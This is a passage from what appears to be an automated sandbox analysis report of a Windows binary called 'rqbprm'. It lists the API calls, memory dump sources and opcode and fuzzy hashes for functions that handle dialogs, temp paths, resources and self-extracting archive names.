                                                                                              • TranslateMessage.USER32(?), ref: 00C7DC7C
                                                                                              • DispatchMessageW.USER32(?), ref: 00C7DC86
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00C7DC91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 2148572870-0
                                                                                              • Opcode ID: 91ba73ac5112ce7ede243b6664a946b7a88626113ff7e5a7bf0240fdaeefbd4a
                                                                                              • Instruction ID: de9070013b5b0ff95849fd1c3bd6e14502414c577efc151ff0fd0f97774f4dc3
                                                                                              • Opcode Fuzzy Hash: 91ba73ac5112ce7ede243b6664a946b7a88626113ff7e5a7bf0240fdaeefbd4a
                                                                                              • Instruction Fuzzy Hash: E0F01472A01259BACA216BA5EC4DFCF7F7DEF42791B008021F50AE2060D6648646CAA0
                                                                                              APIs
                                                                                                • Part of subcall function 00C705DA: _wcslen.LIBCMT ref: 00C705E0
                                                                                                • Part of subcall function 00C6B92D: _wcsrchr.LIBVCRUNTIME ref: 00C6B944
                                                                                              • _wcslen.LIBCMT ref: 00C6C197
                                                                                              • _wcslen.LIBCMT ref: 00C6C1DF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$_wcsrchr
                                                                                              • String ID: .exe$.rar$.sfx
                                                                                              • API String ID: 3513545583-31770016
                                                                                              • Opcode ID: dc5c54463ae91ad83b9e7932e20cac1fb5163860aa51868c0a9af9c789dce5e5
                                                                                              • Instruction ID: f1a4ff1d18e6ed82d7557142a83d56a7f775854e81d11d4140bb423205ebdd90
                                                                                              • Opcode Fuzzy Hash: dc5c54463ae91ad83b9e7932e20cac1fb5163860aa51868c0a9af9c789dce5e5
                                                                                              • Instruction Fuzzy Hash: 92412622540351D5C731AF7488D6A7FB3A8EF41714F24490EFDE5AB181EB604F81D395
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 00C7CE9D
                                                                                                • Part of subcall function 00C6B690: _wcslen.LIBCMT ref: 00C6B696
                                                                                              • _swprintf.LIBCMT ref: 00C7CED1
                                                                                                • Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5
                                                                                              • SetDlgItemTextW.USER32(?,00000066,00CA946A), ref: 00C7CEF1
                                                                                              • EndDialog.USER32(?,00000001), ref: 00C7CFFE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: %s%s%u
                                                                                              • API String ID: 110358324-1360425832
                                                                                              • Opcode ID: 7687980d5533188fe152c0f41577637b692176865f74d5d9227d57ed922b730f
                                                                                              • Instruction ID: 18ab468f9051a2c01d924769fc93b679f38249c04b5f6f9d48622ab9d7e438b0
                                                                                              • Opcode Fuzzy Hash: 7687980d5533188fe152c0f41577637b692176865f74d5d9227d57ed922b730f
                                                                                              • Instruction Fuzzy Hash: 394150B1900259AADF259BA0DC85FEE77BCEB15344F40C0A6FA0EE7051EE709A44DF61
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00C6BB27
                                                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00C6A275,?,?,00000800,?,00C6A23A,?,00C6755C), ref: 00C6BBC5
                                                                                              • _wcslen.LIBCMT ref: 00C6BC3B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CurrentDirectory
                                                                                              • String ID: UNC$\\?\
                                                                                              • API String ID: 3341907918-253988292
                                                                                              • Opcode ID: b09fddba12182616321c21eb4687e361b8b3cc090104b10aaa430e88f2537ece
                                                                                              • Instruction ID: 0619d31b6730a7b6302bd2bd89014106414cbdadfdf7849fc073d695b04e7ceb
                                                                                              • Opcode Fuzzy Hash: b09fddba12182616321c21eb4687e361b8b3cc090104b10aaa430e88f2537ece
                                                                                              • Instruction Fuzzy Hash: 38416A71440256B6CF31AF60CC86EAA7BADAF45390F108466F869E2151EB70DFD09B60
                                                                                              APIs
                                                                                              • LoadBitmapW.USER32(00000065), ref: 00C7B6ED
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00C7B712
                                                                                              • DeleteObject.GDI32(00000000), ref: 00C7B744
                                                                                              • DeleteObject.GDI32(00000000), ref: 00C7B767
                                                                                                • Part of subcall function 00C7A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00C7B73D,00000066), ref: 00C7A6D5
                                                                                                • Part of subcall function 00C7A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00C7B73D,00000066), ref: 00C7A6EC
                                                                                                • Part of subcall function 00C7A6C2: LoadResource.KERNEL32(00000000,?,?,?,00C7B73D,00000066), ref: 00C7A703
                                                                                                • Part of subcall function 00C7A6C2: LockResource.KERNEL32(00000000,?,?,?,00C7B73D,00000066), ref: 00C7A712
                                                                                                • Part of subcall function 00C7A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00C7B73D,00000066), ref: 00C7A72D
                                                                                                • Part of subcall function 00C7A6C2: GlobalLock.KERNEL32(00000000), ref: 00C7A73E
                                                                                                • Part of subcall function 00C7A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00C7A762
                                                                                                • Part of subcall function 00C7A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00C7A7A7
                                                                                                • Part of subcall function 00C7A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00C7A7C6
                                                                                                • Part of subcall function 00C7A6C2: GlobalFree.KERNEL32(00000000), ref: 00C7A7CD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                              • String ID: ]
                                                                                              • API String ID: 1797374341-3352871620
                                                                                              • Opcode ID: 290add10482564ef4ee9931debaa7a8fa6042a4464465d22443653448cd060ab
                                                                                              • Instruction ID: 3dce7700d9d3a13286df0a5fb535c981eb43c480dfabc7762d5489d67d1e0c9d
                                                                                              • Opcode Fuzzy Hash: 290add10482564ef4ee9931debaa7a8fa6042a4464465d22443653448cd060ab
                                                                                              • Instruction Fuzzy Hash: FB01F53690061577C7127774AC09FBF7ABAAFC0B52F088011FD18A7291DF318E0562B2
                                                                                              APIs
                                                                                                • Part of subcall function 00C61316: GetDlgItem.USER32(00000000,00003021), ref: 00C6135A
                                                                                                • Part of subcall function 00C61316: SetWindowTextW.USER32(00000000,00C935F4), ref: 00C61370
                                                                                              • EndDialog.USER32(?,00000001), ref: 00C7D64B
                                                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00C7D661
                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00C7D675
                                                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 00C7D684
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: RENAMEDLG
                                                                                              • API String ID: 445417207-3299779563
                                                                                              • Opcode ID: 045292059aee5a47f6d3156363acf31f363f89ea1e8229836c0da96519c5cc7a
                                                                                              • Instruction ID: 8e03ffc24f436d41f326fde155e75b8befe0ae9a21cfa9f2db7a5e90dede541d
                                                                                              • Opcode Fuzzy Hash: 045292059aee5a47f6d3156363acf31f363f89ea1e8229836c0da96519c5cc7a
                                                                                              • Instruction Fuzzy Hash: C8012833344214BAD2215F65AE09F5F7B7CEF5AB02F018914F30BA20D1C6A29B058775
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00C87E24,00000000,?,00C87DC4,00000000,00C9C300,0000000C,00C87F1B,00000000,00000002), ref: 00C87E93
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C87EA6
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00C87E24,00000000,?,00C87DC4,00000000,00C9C300,0000000C,00C87F1B,00000000,00000002), ref: 00C87EC9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 9474e9a3171280c62a61e4267ab82be16a41482acfe34fa030d6a3d990baee33
                                                                                              • Instruction ID: e0a92ae89abd4119905cca848bd8610161aa6b6fc196e6d440a7a1d3f8ecebf9
                                                                                              • Opcode Fuzzy Hash: 9474e9a3171280c62a61e4267ab82be16a41482acfe34fa030d6a3d990baee33
                                                                                              • Instruction Fuzzy Hash: F9F04431904218BFCB119BA0DC0DB9EBFB4EB44715F1141AAF815A2190DB319F40CB94
                                                                                              APIs
                                                                                                • Part of subcall function 00C7081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C70836
                                                                                                • Part of subcall function 00C7081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00C6F2D8,Crypt32.dll,00000000,00C6F35C,?,?,00C6F33E,?,?,?), ref: 00C70858
                                                                                              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00C6F2E4
                                                                                              • GetProcAddress.KERNEL32(00CA81C8,CryptUnprotectMemory), ref: 00C6F2F4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                              • API String ID: 2141747552-1753850145
                                                                                              • Opcode ID: 8f7f6d5e204f77374c00dc84c531da5ad2a5f431d046b08a56e6483b0e5b60dc
                                                                                              • Instruction ID: 9f0acbf22283f2b2862503577f5b599a294d9c1135204d7d13699e253cc2983b
                                                                                              • Opcode Fuzzy Hash: 8f7f6d5e204f77374c00dc84c531da5ad2a5f431d046b08a56e6483b0e5b60dc
                                                                                              • Instruction Fuzzy Hash: 15E086709507819EDB309F74A84DB067BD46F04714F14C83EF0DAD3650DBB4D5419B50
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2252061734-0
                                                                                              • Opcode ID: 7ba61f4c59b6817dd512513bb79d3472c110b9028117a41a54377eec5193dd64
                                                                                              • Instruction ID: ace130d161fabbf67f13006cf5a52cf9664ce1263a82444b08552bc7fb5c72ca
                                                                                              • Opcode Fuzzy Hash: 7ba61f4c59b6817dd512513bb79d3472c110b9028117a41a54377eec5193dd64
                                                                                              • Instruction Fuzzy Hash: 2951F571500212AFEB28AF14D84DB7AB7A4FF14318F24452FEC12475A1E731EE40E798
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00C8BF39
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C8BF5C
                                                                                                • Part of subcall function 00C88E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00C8CA2C,00000000,?,00C86CBE,?,00000008,?,00C891E0,?,?,?), ref: 00C88E38
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C8BF82
                                                                                              • _free.LIBCMT ref: 00C8BF95
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C8BFA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 336800556-0
                                                                                              • Opcode ID: d0fee74332d9ddad230ed502816860f9122fb3a0dedcf44d562756efaff421fd
                                                                                              • Instruction ID: eb9f52c7b4a1e522e955fb53c742a21ca22374eade25fe8cb1caf89c2c2d43be
                                                                                              • Opcode Fuzzy Hash: d0fee74332d9ddad230ed502816860f9122fb3a0dedcf44d562756efaff421fd
                                                                                              • Instruction Fuzzy Hash: 7701FC7A6012117F232136F75C8CD7F6B6DDEC2B983140129FA04C2211EF60DE0197B4
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,00CA1030,00000200,00C891AD,00C8617E,?,?,?,?,00C6D984,?,?,?,00000004,00C6D710,?), ref: 00C8986E
                                                                                              • _free.LIBCMT ref: 00C898A3
                                                                                              • _free.LIBCMT ref: 00C898CA
                                                                                              • SetLastError.KERNEL32(00000000,00C93A34,00000050,00CA1030), ref: 00C898D7
                                                                                              • SetLastError.KERNEL32(00000000,00C93A34,00000050,00CA1030), ref: 00C898E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              • Opcode ID: 9e59fc0299a11784817fbc5fe11543d38a30edb94010830ac66eda409459c2b7
                                                                                              • Instruction ID: 225399fb2a507780fc6549ba11e5b01acb27d0ca43b063b180fdbed5db93187b
                                                                                              • Opcode Fuzzy Hash: 9e59fc0299a11784817fbc5fe11543d38a30edb94010830ac66eda409459c2b7
                                                                                              • Instruction Fuzzy Hash: 3A012632100603ABC21272656C89B3F2569DBD237DB290036F410A22D1EF348D02A32D
                                                                                              APIs
                                                                                                • Part of subcall function 00C711CF: ResetEvent.KERNEL32(?), ref: 00C711E1
                                                                                                • Part of subcall function 00C711CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00C711F5
                                                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00C70F21
                                                                                              • CloseHandle.KERNEL32(?,?), ref: 00C70F3B
                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 00C70F54
                                                                                              • CloseHandle.KERNEL32(?), ref: 00C70F60
                                                                                              • CloseHandle.KERNEL32(?), ref: 00C70F6C
                                                                                                • Part of subcall function 00C70FE4: WaitForSingleObject.KERNEL32(?,000000FF,00C71206,?), ref: 00C70FEA
                                                                                                • Part of subcall function 00C70FE4: GetLastError.KERNEL32(?), ref: 00C70FF6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 1868215902-0
                                                                                              • Opcode ID: d07d91f53de0fed0ffcdd4fc00361bb5c4bbed1d9e33b473ca155ed8fcac4e77
                                                                                              • Instruction ID: 012691ca4cb4b7c3acec037dad34391eaec4860536754c3a53d05d465aa3af86
                                                                                              • Opcode Fuzzy Hash: d07d91f53de0fed0ffcdd4fc00361bb5c4bbed1d9e33b473ca155ed8fcac4e77
                                                                                              • Instruction Fuzzy Hash: F6017172100784EFC7329FA4DC89BCAFBA9FB08710F10492AF26B92160CB757A45DB54
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00C8C817
                                                                                                • Part of subcall function 00C88DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8C896,00C93A34,00000000,00C93A34,00000000,?,00C8C8BD,00C93A34,00000007,00C93A34,?,00C8CCBA,00C93A34), ref: 00C88DE2
                                                                                                • Part of subcall function 00C88DCC: GetLastError.KERNEL32(00C93A34,?,00C8C896,00C93A34,00000000,00C93A34,00000000,?,00C8C8BD,00C93A34,00000007,00C93A34,?,00C8CCBA,00C93A34,00C93A34), ref: 00C88DF4
                                                                                              • _free.LIBCMT ref: 00C8C829
                                                                                              • _free.LIBCMT ref: 00C8C83B
                                                                                              • _free.LIBCMT ref: 00C8C84D
                                                                                              • _free.LIBCMT ref: 00C8C85F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 5e081f2d12b1ff62f5f727a0cfe8573fed81212436d180fbb39008273001ec18
                                                                                              • Instruction ID: c73af0360e9378a7a691bf0ae715227236434819ddaabd76e40f6f71b17182f4
                                                                                              • Opcode Fuzzy Hash: 5e081f2d12b1ff62f5f727a0cfe8573fed81212436d180fbb39008273001ec18
                                                                                              • Instruction Fuzzy Hash: CCF01232544211AB8720FB68E4C9E1B73EAAB1071C795181BF118D7A92CB70FD80CB68
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00C71FE5
                                                                                              • _wcslen.LIBCMT ref: 00C71FF6
                                                                                              • _wcslen.LIBCMT ref: 00C72006
                                                                                              • _wcslen.LIBCMT ref: 00C72014
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00C6B371,?,?,00000000,?,?,?), ref: 00C7202F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
